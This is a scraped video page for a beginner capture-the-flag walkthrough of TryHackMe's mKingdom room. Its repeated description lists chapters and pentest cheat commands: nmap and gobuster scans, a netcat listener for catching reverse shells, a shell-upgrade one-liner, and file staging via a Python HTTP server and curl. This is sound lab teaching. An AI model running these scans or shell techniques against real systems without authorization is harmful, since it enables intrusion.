Intro to Hacking & CTFs with TryHackMe π΅οΈββοΈ
Learn the basics of hacking and CTFs using Kingdom CTF on TryHackMe. Perfect for beginners interested in cybersecurity.

pebble
6.4K views β’ Jun 21, 2024

About this video
In this video, I give an intro to approaching CTFs using Kingdom CTF on TryHackMe.
If you want to learn more about hacking, check out my Twitch where I am every Sunday @ 12 PM EST
https://www.twitch.tv/pebl3/
Join HackTheBox: https://hacktheboxltd.sjv.io/jrMWo0
Join the discord: https://discord.gg/Dqfhyt6byn
0:00 Intro
0:34 VPN
1:23 Enumeration
5:35 Initial Foothold
9:52 Lateral Movement
13:26 Privilege Escalation
TryHackMe mKingdom: https://tryhackme.com/r/room/adventofcyber2023
https://revshells.com
https://gchq.github.io/CyberChef/
https://github.com/DominicBreuker/pspy/releases/tag/v1.2.1
sudo openvpn (.ovpn path)
nmap (ip) -p- -sVC -T4 -oN (filename)
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://(ip):(port)/ -x txt -o (filename)
nc -lvnp 443
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
python3 -m http.server 80
curl http://(ip):(port)/(file) -o (filename)
cybersecurity enginer,pentest,ethical hacker,#hacker,Cybersecurity,Ethical Hacking,beginner hacker,bypass login,code injection,ctf,cybersecurity,exploit,hacker,hacking,how to hack,injection,pebble,pebl3,tryhackme,windows hacking,hackers,linux hacking,hackthebox,mKingdom,mKingdom ctf,mkingdom tryhackme,intro to ctf,intro to hacking,information technology,how to ctf
Music by White Bat Audio
If you want to learn more about hacking, check out my Twitch where I am every Sunday @ 12 PM EST
https://www.twitch.tv/pebl3/
Join HackTheBox: https://hacktheboxltd.sjv.io/jrMWo0
Join the discord: https://discord.gg/Dqfhyt6byn
0:00 Intro
0:34 VPN
1:23 Enumeration
5:35 Initial Foothold
9:52 Lateral Movement
13:26 Privilege Escalation
TryHackMe mKingdom: https://tryhackme.com/r/room/adventofcyber2023
https://revshells.com
https://gchq.github.io/CyberChef/
https://github.com/DominicBreuker/pspy/releases/tag/v1.2.1
sudo openvpn (.ovpn path)
nmap (ip) -p- -sVC -T4 -oN (filename)
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://(ip):(port)/ -x txt -o (filename)
nc -lvnp 443
python3 -c 'import pty; pty.spawn("/bin/bash")'
CTRL+Z;stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;
python3 -m http.server 80
curl http://(ip):(port)/(file) -o (filename)
cybersecurity enginer,pentest,ethical hacker,#hacker,Cybersecurity,Ethical Hacking,beginner hacker,bypass login,code injection,ctf,cybersecurity,exploit,hacker,hacking,how to hack,injection,pebble,pebl3,tryhackme,windows hacking,hackers,linux hacking,hackthebox,mKingdom,mKingdom ctf,mkingdom tryhackme,intro to ctf,intro to hacking,information technology,how to ctf
Music by White Bat Audio
Tags and Topics
Browse our collection to discover more content in these categories.
Video Information
Views
6.4K
Likes
445
Duration
20:47
Published
Jun 21, 2024
User Reviews
4.6
(1) Related Trending Topics
LIVE TRENDSRelated trending topics. Click any trend to explore more videos.
Trending Now